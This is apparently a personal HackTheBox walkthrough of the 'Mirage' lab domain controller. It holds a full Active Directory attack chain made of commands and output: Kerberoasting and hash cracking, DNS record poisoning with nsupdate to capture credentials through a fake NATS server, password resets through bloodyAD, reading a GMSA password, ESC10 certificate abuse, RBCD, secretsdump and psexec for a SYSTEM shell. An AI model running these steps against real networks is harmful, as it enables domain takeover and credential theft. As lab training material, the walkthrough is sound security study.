Here is my note on MIRAGE box from Hackthebox.
MIRAGE: 10.129.232.163
nmapAutomator.sh --host 10.129.232.163 --type All
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-31 22:35:07Z)
111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# nxc ldap dc01.mirage.htb -d mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --kerberoasting output.txt
LDAP dc01.mirage.htb 389 DC01 [*] None (name:DC01) (domain:mirage.htb)
LDAP dc01.mirage.htb 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
LDAP dc01.mirage.htb 389 DC01 Bypassing disabled account krbtgt
LDAP dc01.mirage.htb 389 DC01 [*] Total of records returned 1
LDAP dc01.mirage.htb 389 DC01 sAMAccountName: nathan.aadam memberOf: CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb pwdLastSet: 2025-06-23 21:18:18.584667 lastLogon:2025-07-04 20:01:43.511763
LDAP dc01.mirage.htb 389 DC01 $krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$0df49e17e59bfec7bb1b5cc3f8cc526d$b849b70453305de628038f6170dd08181a67db9f54bb9b3433516121ec73c062323655fe8155e19c798c96c1f33917479918d890b9247f3027d763b1c89e2cbefa2825f65e85188237060cf7f04f5a29c489015e5447ae34297690fdb4ace43037a0ee78c015eacc19c40c68cabeca8b34a5417e071c087846d93bc65c9d67fc4ccc79b28b04a85df971416264ad082d5e9a746909aea179ec7a5fb8a73513d31f322ffabd3d70ea450342b505b8b400f9b463bed2688d104fd9875612f3e1a3463a3f72811c5b7fd2507b22324a323e37263f43c72cbdb95741033c4143579abe92425c52be981c72e7b4fff94354fe5d91f63790060314e6f43d6e299a0685c0eec4a920ce890f7814e4c583a483275cb682d6baf0baea162bed5330823206a2960549cc5eff26fe4b17d0195105f63f8b64b51449a3c328318ef4885b5b300b8d4360603ee3ce5a256d32ae4162f0aa47abe18f58aafeb09ef6a9da97fd0103633aa99ae31bca927fd78d6460fed1950dcc1da1ea99fa9d0b5a7bf1649a8bcc19d0c3b6ca3fcb5e4c3a45cfe31d2e507971d5445201a726cfc5b8087e56bbfe0ef82ea3586c95b0e683f395518749de11290c2e8beafa8097ebf6aaf8990c8727cd756d8f02f90129e1444d968cb015ae0131f5a72d8b19f1d25e52495e26c1b1cfa465e849e1aca96c85c4be63459083aa716e0f61e6f60fd76677a6ec4d5c5a6ba33a47061a3084a492363c0e82d67d60fe67e99dea2075aaf43773ba1a70358ff3edfa769a7a1d0f9643704cfd7f6405d4b60032f03069469c34c5d6dbde8c1e62e7fa918d76b13ab4c3166c55fbd17628d64ad220425e7c850d2e8602c41665f716a78ce64da67f6408ab82476eb9164c7355b0ce88cdb91c978b49b87ed8316bb5b5f59e787c2a6614b26275842bd45f53996d7bc40fbec8e8ba7057f40a27e43a4f494db0fbf878e7e0e30901896b787eaa929ebcbe2ae20ed453d785960f716072e0b8c016e4cb532db0835c099fe3f7ed012c37dc4ea593d53e09b1e16a71f309f0a1a7614a9c34be0f47a09a04cbb28639db65a9aecc1edbd2597801edfe18dbbbd0985d5a0a96d1898b0aa4c3ae0ce4b0b5ce49863c2960bd3289cd4e7fd251f986b7fc51f480bbfdddc94453e233f383fbd0245318b0f79767f9af5af74ae581719cbbd06955876407ef7efdaa8d4ad1b97e0a52cae909576e446552319b3d48c6fe6880e0fbe3b9533a3bca4d02910017e7811441591d146f2e3c7fdc432da6b355bfdde2a952d82f73a9aa628ba9bfc2c0260e14217ebc914c759dca3ae2e36a9e7a344fe5096b0de140a545a254258be90dc58d640303427d415c1ceda532470473be6acbd0721e16d675245e1ee9913a4dc7176a0e227bfa5970e5eb06f7014e4ad845c5afcdb98a21106d84b4d4ea0bab21893f02274337af0c876e85db08f666b53a2c44c0635012024fcbae3cd36f7cfc3b6fc3a0a978b6687654a9f390d200cb7ee0dbd41b12fdfe9043f8907330e8296d913c4df8aa017b1045210635876f31a1d9462367a7ab1309d51b95a702
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
nathan.aadam:3edc#EDC3
nathan.aadam is a remote management user = USER-SHELL !
nxc ldap dc01.mirage.htb -d mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' --dns-server 10.129.232.163 -k --bloodhound --collection All
nxc ldap dc01.mirage.htb -d mirage.htb -u nathan.aadam -p '3edc#EDC3' --dns-server 10.129.232.163 -k --bloodhound --collection All
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
2049/tcp open nfs 2-4 (RPC #100003)
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# showmount -e 10.129.232.163
Export list for 10.129.232.163:
/MirageReports (everyone)
sudo mount -t nfs 10.129.232.163:/MirageReports . -o nolock
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# ls
Mirage nmap nmapAutomator_10.129.232.163_All.txt recon
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# cd Mirage
ls
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Mirage]
└─# ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Mirage]
└─# ls -lah
total 18M
drwxrwxrwx 2 nobody nogroup 64 May 26 21:41 .
drwxr-xr-x 5 root root 4.0K Aug 31 21:40 ..
-rwx------ 1 nobody nogroup 8.2M May 20 15:08 Incident_Report_Missing_DNS_Record_nats-svc.pdf
-rwx------ 1 nobody nogroup 9.0M May 26 21:37 Mirage_Authentication_Hardening_Report.pdf
Incident_Report_Missing_DNS_Record_nats-svc.pdf:
nats-svc.mirage.htb = went missing confirmed from dc01.mirage.htb
Security Consideration:
In development environments, fixed service names such as nats-svc.mirage.htb
are often hardcoded in applications. If the DNS record is missing, some apps
may still attempt to connect to that name. This behavior could be abused by attacks if DNS records are hijacked.
The Security Team should monitor such cases closely to ensure no unauthorized DNS responses are injected or spoofed in the network.
DNS Poisoning:
dnsupadate.txt:
server [RHOST]
zone mirage.htb
update delete nats-svc.mirage.htb A
update add nats-svc.mirage.htb 60 A [LHOST]
send
In this case:
server 10.129.232.163
zone mirage.htb
update delete nats-svc.mirage.htb A
update add nats-svc.mirage.htb 60 A 10.10.14.174
send
nsupdate dnsupadate.txt
https://github.com/s4orii/Fake-NATS
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Fake-NATS]
└─# python3 mirage-exploit.py
[!] Use: ./mirage-exploit.py <VPN IP> <MIRAGE IP>
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Fake-NATS]
└─# python3 mirage-exploit.py 10.10.14.174 10.129.232.163
[+] Creating Fake server info
[+] Configuration Created
[+] Updating DNS Record >:)
[+] Successfully updated >:), DNS for NATS SVC now is 10.10.14.174
[+] Fake NATS on 0.0.0.0:4222 for 60s
[+] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}
PING
Dev_Account_A:hx5h7F5554fP@1337!
This credential is for nats server which run on tcp port 4222.
nats --server nats://mirage.htb:4222 rtt --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
nats stream ls --server nats://mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
nats consumer add auth_logs reader --pull --server nats://mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
nats consumer next auth_logs reader --count=5 --server nats://mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 2 / str seq: 2 / pending: 3
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 3 / str seq: 3 / pending: 2
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 4 / str seq: 4 / pending: 1
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 5 / str seq: 5 / pending: 0
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
david.jjackson:pN8kQmn6b86!1234@
faketime -f $(ntpdate -q mirage.htb | awk '{print $4}') bash
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# nxc smb dc01.mirage.htb -d mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
SMB dc01.mirage.htb 445 dc01 [*] x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False)
SMB dc01.mirage.htb 445 dc01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
Mirage_Authentication_Hardening_Report.pdf:
So kerberos authentication only and no ntlm authentication anymore.
ad-security@mirage.htb
/etc/krb5.conf:
[libdefaults]
default_realm = MIRAGE.HTB
# The following krb5.conf variables are only for MIT Kerberos.
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
# The following libdefaults parameters are only for Heimdal Kerberos.
fcc-mit-ticketflags = true
[realms]
MIRAGE.HTB = {
kdc = 10.129.232.163
admin_server = 10.129.232.163
}
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
4222/tcp open vrml-multi-use
5985/tcp open wsman
nathan.aadam:3edc#EDC3
getTGT.py mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip 10.129.232.163
export KRB5CCNAME=nathan.aadam.ccache
evil-winrm -i dc01.mirage.htb -r mirage.htb
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# getTGT.py mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip 10.129.232.163
/home/kali/BOXES/MIRAGE/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in nathan.aadam.ccache
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# export KRB5CCNAME=nathan.aadam.ccache
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> whoami
mirage\nathan.aadam
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> whoami
mirage\nathan.aadam
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> hostname
dc01
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> dir
Directory: C:\Users\nathan.aadam\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/4/2025 1:01 PM 2312 Microsoft Edge.lnk
-ar--- 8/31/2025 3:26 PM 34 user.txt
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
nathan.aadam -> Administrator
WINPEAS:
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : MIRAGE
DefaultUserName : mark.bbond
DefaultPassword : 1day@atime
mark.bbond:1day@atime
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
REG QUERY HKCU /F "DefaultPassword" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Bloodhound Data:
mark.bbond -> Member Of -> IT_SUPPORT -> ForceChangePassword -> javier.mmarshall #With BloodyAD + Kerberos and javier.mmarshall account disabled -> enabled
getTGT.py mirage.htb/mark.bbond:'1day@atime' -dc-ip 10.129.232.163
export KRB5CCNAME=mark.bbond.ccache
net rpc password "javier.mmarshall" "Password123" -U "MIRAGE"/"mark.bbond"%"1day@atime" -S "dc01.mirage.htb"
Didn't work because javier.marshall account is disabled.
We can enabled it again with bloodyAD.
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall userAccountControl -v 512
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall logonHours
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set password javier.mmarshall 'Password123@'
#Make sure to use current version of bloodyAD.
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall userAccountControl -v 512
[+] javier.mmarshall's userAccountControl has been updated
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall logonHours
[!] Attribute encoding not supported for logonHours with bytes attribute type, using raw mode
[+] javier.mmarshall's logonHours has been updated
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set password javier.mmarshall 'Password123@'
[+] Password changed successfully!
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163/BLOOD]
└─# nxc smb dc01.mirage.htb -d mirage.htb -u javier.mmarshall -p 'Password123@' -k
SMB dc01.mirage.htb 445 dc01 [*] x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False)
SMB dc01.mirage.htb 445 dc01 [+] mirage.htb\javier.mmarshall:Password123@
javier.mmarshall -> ReadGMSAPassword -> MIRAGE-SERVICE$
bloodyAD --host "10.129.232.163" -d "mirage.htb" -u "javier.mmarshall" -p "Password123@" get object MIRAGE-SERVICE$ --attr msDS-ManagedPassword -k
python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host "dc01.mirage.htb" --dc-ip 10.129.232.163 -d "mirage.htb" -u "javier.mmarshall" -p "Password123@" -k get object MIRAGE-SERVICE$ --attr msDS-ManagedPassword
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host "dc01.mirage.htb" --dc-ip 10.129.232.163 -d "mirage.htb" -u "javier.mmarshall" -p "Password123@" -k get object MIRAGE-SERVICE$ --attr msDS-ManagedPassword
distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:7a77d15fb5a4b7035ef2524b1cc4142f
msDS-ManagedPassword.B64ENCODED: 9jszGNTmy77qjkjRxDnCu4oLGZj4ETQ96iw5RZHonL/BORDMGN0o7nHJs3e+wlciM6bCHWPQ5s4Y+Cd96Ax2SHetWsgJiOfJpyuksNXJRNNh3tOOon+RUSYUll5LN4SVE+cQEOiHwQ+im7Gad2Mw29dZPBxKKFzNaXKI6CD30C+egdJOL6q5KqbICurF50J3BJg4viq+s4rhb+iIYKqnFEZSvkTSxNgf9qpBRmBIwPIIpbBJ39XsoNQVN2IKf3KO/yuuOmN0lXVOp5T2OXceO58juAoCHbFdkUkkKXoosp1caCaePaNsrDOrpmKnj1k7V7bLlsxl16oUa8xPohJQFA==
Mirage-Service$:7a77d15fb5a4b7035ef2524b1cc4142f
ESC10 Attack NOTES:
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL'
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
EventLogging REG_DWORD 0x1
CertificateMappingMethods REG_DWORD 0x4
CertificateMappingMethods = 0x4 = ESC10 AD CS Attack.
getTGT.py mirage.htb/Mirage-Service\$ -hashes :7a77d15fb5a4b7035ef2524b1cc4142f
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# getTGT.py mirage.htb/Mirage-Service\$ -hashes :7a77d15fb5a4b7035ef2524b1cc4142f
/home/kali/BOXES/MIRAGE/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Mirage-Service$.ccache
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# export KRB5CCNAME=Mirage-Service$.ccache
certipy account update \
-user 'mark.bbond' \
-upn 'dc01$@mirage.htb' \
-u 'mirage-service$@mirage.htb' \
-k -no-pass \
-dc-ip 10.129.232.163 \
-target dc01.mirage.htb
Revert UPN and Request a Certificate:
export KRB5CCNAME=mark.bbond.ccache
certipy req \
-u 'mark.bbond@mirage.htb' \
-k -no-pass \
-dc-ip 10.129.232.163 \
-target 'dc01.mirage.htb' \
-ca 'mirage-DC01-CA' \
-template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'dc01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
UPN Reversion:
export KRB5CCNAME=Mirage-Service$.ccache
certipy account update \
-user 'mark.bbond' \
-upn 'mark.bbond@mirage.htb' \
-u 'mirage-service$@mirage.htb' \
-k -no-pass \
-dc-ip 10.129.232.163 \
-target dc01.mirage.htb
LDAP Shell + Resource-Based Constrained Delegation (RBCD):
certipy auth \
-pfx dc01.pfx \
-dc-ip 10.129.232.163 \
-ldap-shell
In the shell:
set_rbcd dc01$ Mirage-Service$
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# klist
Ticket cache: FILE:Mirage-Service$.ccache
Default principal: Mirage-Service$@MIRAGE.HTB
Valid starting Expires Service principal
09/01/2025 08:13:43 09/01/2025 18:13:43 krbtgt/MIRAGE.HTB@MIRAGE.HTB
renew until 09/02/2025 08:13:43
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# certipy auth \
-pfx dc01.pfx \
-dc-ip 10.129.232.163 \
-ldap-shell
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'dc01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.232.163:636'
[*] Authenticated to '10.129.232.163' as: 'u:MIRAGE\\DC01$'
Type help for list of commands
# set_rbcd dc01$ Mirage-Service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
Mirage-Service$ can now impersonate users on dc01$ via S4U2Proxy
getST.py -spn 'cifs/DC01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.129.232.163 'mirage.htb/Mirage-Service$' -hashes :7a77d15fb5a4b7035ef2524b1cc4142f
[SNIP]
[*] Saving ticket in dc01$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache
export KRB5CCNAME='dc01$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache'
secretsdump.py -k -no-pass -dc-ip 10.129.232.163 dc01.mirage.htb
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1adcc3d4a7f007ca8ab8a3a671a66127:::
mirage.htb\Dev_Account_A:1104:aad3b435b51404eeaad3b435b51404ee:3db621dd880ebe4d22351480176dba13:::
mirage.htb\Dev_Account_B:1105:aad3b435b51404eeaad3b435b51404ee:fd1a971892bfd046fc5dd9fb8a5db0b3:::
mirage.htb\david.jjackson:1107:aad3b435b51404eeaad3b435b51404ee:ce781520ff23cdfe2a6f7d274c6447f8:::
[SNIP]
Administrator:7be6d4f3c2b9c0e3560f5a29eeb1afb3
getTGT.py -dc-ip 10.129.232.163 -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3 mirage.htb/Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass dc01.mirage.htb
psexec.py -k -no-pass dc01.mirage.htb
/home/kali/BOXES/MIRAGE/10.129.232.163/certipy-venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.mirage.htb.....
[*] Found writable share ADMIN$
[*] Uploading file jrIugbnc.exe
[*] Opening SVCManager on dc01.mirage.htb.....
[*] Creating service SBYR on dc01.mirage.htb.....
[*] Starting service SBYR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
dc01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 014F-FCE7
Directory of C:\Users\Administrator\Desktop
07/04/2025 01:03 PM <DIR> .
05/25/2025 02:54 PM <DIR> ..
08/31/2025 03:26 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4,077,596,672 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECT]
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
52741/tcp open unknown
60221/tcp open unknown
60222/tcp open unknown
60237/tcp open unknown
60243/tcp open unknown
60267/tcp open unknown
64735/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-31T22:35:54
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h12m08s